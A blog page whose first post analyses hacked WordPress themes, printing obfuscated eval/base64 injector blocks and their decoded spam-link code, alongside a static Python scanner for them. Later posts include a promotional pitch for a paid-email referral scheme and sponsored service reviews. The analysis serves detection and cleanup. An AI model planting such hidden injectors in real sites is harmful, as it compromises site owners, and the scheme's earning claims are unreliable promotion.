Hacked WordPress

While I was away on my sabbatical (read: coping with the all-new fatherhood), I occasionally managed to catch a glimpse of the latest action dramas unfolding on the net – primarily because the WordPress dashboard made it a point to present them to me on a daily basis. One of them caught my fancy and I decided to take a deeper look. The topic was Technorati & hacked WordPress blogs. More than Technorati, it was the article on Weblog Tools Collection that got me wondering…

The premises

While I had made it a point to keep abreast of the WordPress releases and firmly believed that my blog wasn’t affected by this, I wasn’t quite so sure about a couple of other blogs that I had installed for my friends / clients. Going through a few of them, I noticed that all of them had a profuse amount of random & unrelated links in their footer besides containing links to a group of common sites in their blogroll. While the footer links were more or less random (and still acceptable), I couldn’t believe that, strangers as they were, all my friends & clients had managed to put their heads together and point to the same group of sites! Naturally, I asked around and found out that none of them had ever added those links in person and that even they were confused as to where they came from. Being new to blogging, most of them had taken it for granted that those links were a part of the WordPress ring and had been placed there as a reciprocating gesture for providing such a terrific blogging platform for free.

The investigation

My first step was to dig into the file footer.php, where I encountered this strange sequence of code. Here’s an example…

<?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';
eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96))); ?>

Looks scary, doesn’t it? :D Managed to give me a fright at first sight too. Whereas I was expecting a bunch of hard-coded links, you get this!! Fear not. A second glance will tell you that the code isn’t really as mumbo-jumbo-ish as it looks. It contains 2 distinct PHP statements. The first one is simply the assignment of the scrambled sequence of characters to a horribly named variable, i.e. $Gdb63b0c686622a27d0bdb237219e0e96.

<?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';

This statement alone didn’t make much sense though. It was the second statement, with its share of nested functions, that started shedding light on the whole issue…

eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96)));

If you’re familiar with PHP even a bit, you’ll begin to realise that this statement decodes whatever nastiness is lurking in the first line and executes it using eval(). Reading the nested calls from the inside out gives the order of decoding: the string is first base64-decoded (the same encoding that is applied to email attachments) and the result is then decompressed with gzinflate(). In other words, the original code was compressed first and base64-encoded afterwards.

To really get behind the mystery code, you need to be able to SEE it. Rather simple. Just replace the eval() statement with an echo and it’ll spit the code out onto your screen instead of executing it. Following that, we modify the code block to look like this…

<?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';
echo gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96));
?>

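Save this code in a new PHP file and execute it from your local PHP-enabled web-server installation (in my case XAMPP). If you load it in a browser, view the page source, because the decoded output is HTML and PHP that the browser would otherwise render rather than show. Here’s what you get…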

footer


<?php wp_footer(); ?>

Pretty much, the kind of code you’d expect in a WordPress theme footer. While one can accept the link to http://wordpressthemes.weblogs.us as the default link to the theme hosting service, I couldn’t understand what Vacation Reality had to do with it. Still, so much for the footer. All I had to do now, was to remove the whole block of code and create a clean footer as specified by my clients.

The second complaint was regarding those common links that kept appearing in the blogroll. As it turned out, some of my clients had tried deleting those links only to have them re-appear a couple of hours down the line. Time to investigate again. This time it was the file functions.php. Didn’t have to look far. A search for the terms eval and base64 got me to the desired point. Once again I faced a block of code that went like…

<?php }
$Q0d299dceb2cb08cb71bfbc1414b1505a='hZBBawIxEIXPm18xDAUTsN
pzZb3ISg9tBbvFY4gmajCbhCTbUMT/3m6qpx68DTPfvPdmiJCSi13SzlJUUi
fuXUw4Rm2jComno+oUN9qekM3IvrcFhX9TyuBMqoNxW2HgIXu5nZFK72k
pH+cHlfiXCBQ/mtdm0cJi9fne0mGRa8lguV69wRUdmhE2L826gQL0wdSjY0r
+eTrNOU+yC9IHFWPsvTdaxcnOdSNkdf3ESFVlz6/pSi4RgvimWJSs6BRCPQ
fc3DSgHU6IOAa8mf0R9wwR2O9DLuQH';
eval(gzinflate(base64_decode($Q0d299dceb2cb08cb71bfbc1414b1505a)));
?>

Taking the same road as the first time fetched me this very interesting block of code…

add_action("edit_post","insert_theme_link");
function insert_theme_link() {
    global $wpdb;
    if($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://www.wordpresssupplies.com'")==0)
        wp_insert_link(array("link_name" => "Wordpress Themes", "link_url" => "http://www.wordpresssupplies.com" ));
}

The code should be fairly self-explanatory. What we have is a function named insert_theme_link that adds a link to wordpresssupplies.com to your blogroll (contained in the table wp_links in the WordPress database), if the link isn’t present. The noteworthy line here is add_action( "edit_post","insert_theme_link" ).

The add_action function is a plug-in API hook for WordPress.

  • The first parameter dictates which WordPress action to hook or watch out for.
  • The second parameter is the name of the function that is called when the hooked action occurs.

In our case, the action is edit_post, i.e. whenever the blog author edits a post, the function that adds the link to the blogroll is executed. Hence the mysteriously re-appearing link!
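The decode-and-inspect steps above (swap eval for echo, then read which hooks the payload registers) can also be done statically, so that nothing from the theme is ever executed. The following is an added example, not code from the original post; it recognises only the $var='…'; eval(gzinflate(base64_decode($var))) wrapper shown here, and make_sample, SAMPLE_PAYLOAD and the spam.example.invalid URL are constructed for the demonstration.

```python
import base64
import re
import zlib
from pathlib import Path

# Wrapper shape shown on the page: $var='<base64>'; eval(gzinflate(base64_decode($var)));
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([A-Za-z0-9+/=\s]+)'\s*;")
EVAL_RE = re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*\$(\w+)")
HOOK_RE = re.compile(r"add_action\s*\(\s*[\"'](\w+)[\"']\s*,\s*[\"'](\w+)[\"']")
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
MAX_LAYERS = 10        # stop following nested wrappers after this depth
MAX_BYTES = 1 << 20    # refuse payloads that inflate past 1 MiB


def inflate(b64_text):
    """PHP base64_decode() followed by gzinflate() (raw DEFLATE, no header)."""
    raw = base64.b64decode("".join(b64_text.split()))
    stream = zlib.decompressobj(wbits=-15)
    out = stream.decompress(raw, MAX_BYTES)
    if stream.unconsumed_tail:
        raise ValueError("payload exceeds size cap")
    return out.decode("utf-8", errors="replace")


def decode_layers(php_source, depth=0):
    """Return every hidden payload as text, outermost first; nothing is executed."""
    payloads = []
    if depth >= MAX_LAYERS:
        return payloads
    blobs = dict(ASSIGN_RE.findall(php_source))
    for var in EVAL_RE.findall(php_source):
        try:
            decoded = inflate(blobs[var])
        except (KeyError, ValueError, zlib.error):
            continue  # variable not assigned here, or not base64/DEFLATE data
        payloads.append(decoded)
        payloads += decode_layers(decoded, depth + 1)
    return payloads


def report(php_source):
    """Summarise what the decoded payloads would do inside WordPress."""
    found = {"payloads": 0, "hooks": [], "inserts_links": False, "urls": []}
    for payload in decode_layers(php_source):
        found["payloads"] += 1
        found["hooks"] += HOOK_RE.findall(payload)
        found["inserts_links"] |= "wp_insert_link" in payload
        found["urls"] += URL_RE.findall(payload)
    return found


def scan_theme(theme_dir):
    """Map each .php file under theme_dir that hides a payload to its report."""
    results = {}
    for path in sorted(Path(theme_dir).rglob("*.php")):
        found = report(path.read_text(encoding="utf-8", errors="replace"))
        if found["payloads"]:
            results[str(path)] = found
    return results


def make_sample(php_code):
    """Constructed test input: wrap php_code in the same encoding the page shows."""
    packer = zlib.compressobj(wbits=-15)
    blob = base64.b64encode(packer.compress(php_code.encode()) + packer.flush())
    return f"$Xsample='{blob.decode()}';\neval(gzinflate(base64_decode($Xsample)));"


# Constructed payload modelled on the decoded functions.php block; placeholder URL.
SAMPLE_PAYLOAD = (
    'add_action("edit_post","insert_theme_link");\n'
    'function insert_theme_link() {\n'
    '    wp_insert_link(array("link_url" => "http://spam.example.invalid"));\n}\n'
)
```

Running scan_theme() over an unpacked theme directory before activating it lists every file carrying such a wrapper, together with the hooks and URLs found in the decoded text.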

The nexus

Hot on the track, I decided to follow the link that was being injected here, i.e. wordpresssupplies.com – just to make sure this wasn’t a random case and that I wasn’t tarnishing their reputation by unjustifiably pointing fingers at them. I dropped by their site and picked 3-4 themes from different categories. And what do I find? Every single one of them contained similar code – both in the footer as well as the functions.php. Not just that – studying the links led me to two other sites teeming with hacked themes. For your convenience (and warning) I’m listing them here.

  • http://www.amazingwordpressthemes.com/
  • http://wordpressthemes.weblogs.us/

All of them are nicely decked-up and look like legitimate WordPress theme sites. But be wary of any themes that you download and use from these sites, for they’re certain to contain such code blocks. Apart from these links, you may also notice some other random links being injected – links to car loan sites, cheap dedicated servers etc. – shady businesses which have probably paid the hacked theme sites to insert their links and thus gain PR (pagerank) out of millions of unsuspecting sites utilising these themes.

I tried doing WHOIS on these domains, but that’s where I ran into a wall. They’re either cloaked with Privacy Protect or contain spurious information regarding their owners. But I have a feeling that under the hood, these spammers (I prefer the term spammers here to hackers – as the people who’ve injected this code into the theme are nothing but link spammers) belong to the same group or it’s the work of a lone individual.

The Filipino blogger Yuga outlines a couple of other methods followed by these spammers to capture / break your WordPress installation. The article is a must read.

The conclusion

On a sidenote, these themes can still be used if you carefully snip the spammy code out. Normally, the code-block in functions.php can be entirely eliminated without affecting the theme at all. As for the ones in footer.php, you’ll have to study the underlying code and eliminate the links to these sites, keeping the rest.

For those who want to experiment with such themes, I’m listing a few here for direct downloads. Disabling these themes or switching to another one will (normally) get rid of the injector code – but even then, USE AT YOUR OWN RISK.

Downloads

Emerald Waters (Hacked)  (227.0 KiB, 275 downloads)

Elegance (Hacked)  (501.7 KiB, 266 downloads)

Graytone (Hacked)  (81.9 KiB, 276 downloads)

If you manage to dig up any other hacked theme sites like these, make sure you leave a comment listing them. It’ll serve as a warning note to all those who read this. And of course, if you have any thoughts to share on this issue, feel free…

May 26th by miCRoSCoPiC^eaRthLinG

An average internet user comes across plenty of Get Rich Quick schemes floating around on the net. Almost all of these lure members in with promises of delivering an insane amount of riches in just 3-4 days while you just sit at your computer building up your referral list. You’ll notice something strangely similar about their advertising methods – all of them put substantial emphasis on words & phrases like FREE, FASTEST MONEY MAKING MACHINE EVER, LIVE A DREAM LIFE EVER AFTER etc. and denounce all others in this business. Reading their income outline compels many of us to rush head on and sign up immediately. Unfortunately it doesn’t take long to realise that this “dream opportunity” isn’t really as free as it claims to be. To get any real advantages out of it you’ve to build a massive list of referrals / affiliates and pay a monthly membership fee in order to gain any real benefits out of your down-line. The monthly payment part is what most of these services very conveniently forget to mention in their advertisements. Ah well!

I had played around with a lot of these online money makers before I launched this blog (and started earning advertisement revenue). These schemes operate on the principles of MLM (Multi Level Marketing) or Network Marketing – which means that in order to make some serious money you need to have a large networked down-line. Initially you can always lure others into signing up through similar advertisements. But when it comes to fishing out cash from their own pockets you’ll find a lot of your down-line vanishing into thin air overnight – coz it’s evident to everyone that there’s no guarantee that the scheme would work as advertised. Why waste hard-earned money on such a thing? While I am still interested in making those few extra bucks online – I’ve long since lost faith in all such schemes.

In comes Hits4Pay. I found this site through an AdBrite advertisement that popped up on my site. The catch-phrase sounded interesting but I was quite apprehensive about it. Anyway, there was no harm in spending a couple of seconds signing up for it – so I went ahead with it. To my surprise this turned out to be the first ever scheme that doesn’t ask you to shell out anything from your pockets. You pay absolutely nothing for a membership with them – and never need to pay anything for upgrades either.

Hits4Pay operates on a much simpler principle. While signing-up you choose a bunch of topics that you’re interested in. They’ll keep sending you emails from advertisers about 2-3 times a week. To read the emails, you’ll need to log in to your Hits4Pay account and check your inbox. Once you’ve read the mails, your account gets credited with $0.02 – that is you receive 2 cents for every email you read. Admittedly this isn’t a big amount – but then again, this isn’t a get rich quick scheme either. There’s a scope to earn more by building a down-line. For every email read by your affiliates (1st and 2nd level), you receive $0.01. Having a large down-line can really boost your income – so that’s the only area you need to concentrate on.

What’s more – as of now they’re offering a $10 sign-up bonus. Your account gets padded with $10 the moment you sign up and all emails you read after that go towards topping up that amount. Payouts happen for as low as $25 and get sent directly to your PayPal account.

Here are the key features:

  • Free Sign-up
  • $10 bonus for just signing up
  • No membership / upgradation fees ever
  • Receive paid emails on topics that you choose
  • No spamming
  • A flat income of $0.02 per email you read
  • Earn $0.01 from every email read by your 1st and 2nd level down-lines
  • Minimum Payout $25
  • Payouts occur instantly through PayPal
  • Only limitation – 1 account per household

That more or less summarises the idea. If you’re interested in making some extra cash online, this could definitely be the scheme you’re looking for.

Instead of reading commercial emails for free, receive emails on topics that interest you and Get Paid For It! Hits4Pay is one of the very few highest paying advertising programs in the industry.

Signup for free and receive $10 as a Free Reward.

Sep 26th by miCRoSCoPiC^eaRthLinG

FeedBurner Email Subscriptions are a great way to spread your blog’s content far & wide – by sending your post feeds directly to the inbox of your subscribers. It’s a particularly viable option for the subscribers who don’t want to get into the hassle of firing up their feed reader every day. Quite a few of my regular subscribers utilise this method.

I’ve always kept a tab on each of my feeds using a standard feed reader (FeedReader) and since they appeared fine to me I never really bothered to check on the email based feeds. Recently, I received a bunch of complaints from the email subscribers regarding “broken images” in the emails. Doing a quick check confirmed the reports – the images embedded in the posts were indeed missing. Instead they were replaced by the standard “broken image” icon. It took me a while to figure out the real problem – since the same feed(s) turned up just fine in any given feed reader.

The Problem

The root of the problem lies in how one embeds images and/or links in the posts – i.e. in the absolute or relative URL formats. To save on typing, I’ve always resorted to relative URLs when specifying the source of the images in my posts. This actually is a good practice since it enables you to transfer your site to another domain without any ensuing hiccups over broken links and images. However, this doesn’t always translate properly in case of RSS/Atom feeds. The best thing to do in such cases is to use absolute URLs – so that the images in the feeds get displayed properly when they are viewed independently of the site or even when incorporated in someone else’s site.

As for me, I don’t follow the standardised WordPress approach of uploading all the images under the /wp-content/uploads/ directory. I have my own folder called /postimage/ where I manually upload the pictures and then link them in the relative format. For example, /postimage/image_file.jpg.

When my site is viewed directly in a browser or through a feed reader, the images are automatically located in relation to the site root, i.e. http://chaos-laboratory.com and thus displayed properly. For emailed feeds, the image source attributes get converted to http://postimage/image_file.jpg – which naturally doesn’t make any sense to your browser.

The Solution

Your best bet here is to devise some mechanism where you can still use the relative URLs in your posts – but they automatically get translated to the absolute form (inclusion of your domain name before the folder and file information) in case of feeds.

The first method involves some messy editing of the WordPress feed publishing files (found in the /wp-includes/ folder). In any standard WordPress installation, they’re the PHP files starting with the word feed (feed-atom.php, feed-rss2.php etc). You can edit these files and implement Regular Expression matching routines to replace any relative links with the absolute form. This is more of a pro-coder approach.

The second method is to use a readily available WordPress plug-in named URL Absolutifier which works in a similar way – but translates all your relative URLs to their absolute forms for both your site and feeds. This is the approach I’ve taken up for the time being. Currently I am testing out this plug-in and will report my findings shortly. If it manages to fix my problem, I’ll try and implement the code directly into the feed publishing engine (mentioned in the first method).
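The regular-expression rewrite described in the first method, sketched in Python rather than in the WordPress feed templates. This is an added example, not code from the post or from the URL Absolutifier plug-in; absolutify and SAMPLE_POST are names made up for it, and the base URL is the site root mentioned above.

```python
import re
from urllib.parse import urljoin, urlsplit

# src/href attributes with a quoted value; data-src and similar are left alone.
ATTR_RE = re.compile(
    r"""(?<![\w-])(?P<attr>src|href)\s*=\s*(?P<q>["'])(?P<url>.*?)(?P=q)""",
    re.IGNORECASE | re.DOTALL,
)


def absolutify(html, base_url):
    """Rewrite relative src/href values in feed HTML against base_url."""
    def fix(match):
        url = match.group("url").strip()
        # Leave empty values, in-page anchors and anything that already has a
        # scheme (http:, https:, mailto:, data:) untouched.
        if not url or url.startswith("#") or urlsplit(url).scheme:
            return match.group(0)
        quote = match.group("q")
        return f'{match.group("attr")}={quote}{urljoin(base_url, url)}{quote}'
    return ATTR_RE.sub(fix, html)


# Constructed post fragment using the /postimage/ layout described above.
SAMPLE_POST = '<p><img src="/postimage/image_file.jpg"> <a href="#more">more</a></p>'
```

Passing the post's own permalink as base_url instead of the site root also resolves links written without a leading slash.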

Any thoughts on this?

Sep 17th by miCRoSCoPiC^eaRthLinG

Do you always keep worrying about your beloved pet while at the office? Has the thought of someone breaking into your home started affecting your work? Wouldn’t it be lovely if you had a way of keeping a constant vigil on your home and having peace of mind every time you are away?

Now, if you are willing to utilise the technological edge there are plenty of solutions which can help you out in this. And HomeCamera – which is a recent entrant in this field – happens to do just that. It’s a simple, easy-to-setup service that offers you complete remote monitoring facilities for free. No extra (and fancy) equipment required other than a normal webcam. In fact, with this aptly titled home camera based solution you can hook up as many webcams as you like and monitor every square-inch of your house. On the move and don’t have a net connection at hand? No problem with that either. You can share your camera feeds with any of your trusted buddies and let them take over the monitoring task for a while. HomeCamera offers an archive section, in case you ever need to go back and check on any of the earlier feeds. All of this is accessible from any corner of the world using a standard browser. Here’s a screen-shot of their web-interface.

HomeCamera Web Interface Screenshot

Registration with this service is free and requires only a couple of steps. You need to have a valid email address for this. Once registered you’ll have to download their client software, install it and enter your registration details in it, and you’re good to go. The client auto-detects all the webcams you’ve got attached to your computer and lists them for your convenience. You can assign names & descriptions to each – which show up in the web-interface next time you log in. There’s a pretty slick & accurate motion detection feature that automatically turns on the recording whenever there’s some moving object in the camera’s focal cone. That way you don’t waste valuable disk space or bandwidth by sending out a continuous video stream. You can even specify the length (duration) of each piece of footage that is to be sent out to the HomeCamera server. Cool thing is that the recording isn’t limited to videos – it’s also possible to send out snapshots (pictures). Here’s a screen-shot that shows the motion detection in action. I tilted my head just a little bit and you can see the detection frame zeroing in on that region.

HomeCamera Client Interface Screenshot

The motion detection feature also sends out alerts to your email address and mobile phone (if you choose to) along with a link which directly takes you to the video footage. The mobile messaging part is possibly the only feature which doesn’t come for free. When you sign-up first, you start with 25 mobile credits but you’ll have to purchase additional credits once you exhaust these.

Alternatively, you can disable motion detection and specify an interval (say 10 minutes) at which the footages are sent out on a regular basis. This is called time-lapse recording.

Another big plus point is that HomeCamera works with virtually any given webcam. It also works with most CCTV and wi-fi cameras.

As of now, HomeCamera is in its open public BETA stage and if you sign up as a beta tester you automatically qualify for a free lifetime subscription to the HomeCamera Lite service. Moreover, all beta testers are eligible for special subscription rates for various HomeCamera services in future.

I’ve tested out this service thoroughly and as of now they seem to deliver every bit of their promise. This is a far more viable alternative to all the expensive hardware based monitoring systems available in the market. I highly recommend signing up for a beta trial. You can always take a tour of their site/services before you decide on signing up.

As a footnote I’d like to add that while this is a sponsored post, the views expressed here are entirely unbiased and based on personal experience of this service. In fact I’d been explicitly instructed by HomeCamera to express fair and impartial views.

Sep 11th by miCRoSCoPiC^eaRthLinG

Gmail, Yahoo, Hotmail – whichever email provider you may be using, the size of attachments is always capped to typically 10MB per file and to a total of around 20MB in a single email. Your only workaround is to keep the file sizes within the limit or tediously break up a large file into multiple parts and expect the recipient to join them back again. This can prove to be a productivity killer, especially when you’ve to send in a bunch of files.

Driveway, an online file sharing service, now offers you a simple workaround for this. Parkit™ is a new method of sending in up to 500MB of attachments with each of your mails – simply upload your file to Driveway and send in the Parkit link along with your email. Keep in mind that the 500MB cap is applicable for a single file only – there’s virtually no limit to the amount of data you can upload or download from this service.

Another USP (Unique Selling Proposition) for Driveway is their patent-pending Edit Widgets technology with which you can modify the uploaded documents directly from your computer without having to go through the modify-reupload-resend cycle every time you need to mail a change to everyone in your group. And you can do this directly from your Windows desktop. Currently editable formats are .doc, .xls and .ppt.

Driveway also lets you create embeddable web-widgets with which you can share your files directly through a web-page or a blog. The widgets can stream Flash & FLV movies, MP3 audios or simply display interactive slideshows of your photos (any standard picture format) directly on your site. No additional downloads are required.

Driveway Widgets Screenshot

If “Size really does matter” for you, without any doubts this is the service you’re looking for.

Incidentally, Driveway is brought to you by the excellent hands-free online backup system called IDrive-E.

Sep 03rd by miCRoSCoPiC^eaRthLinG
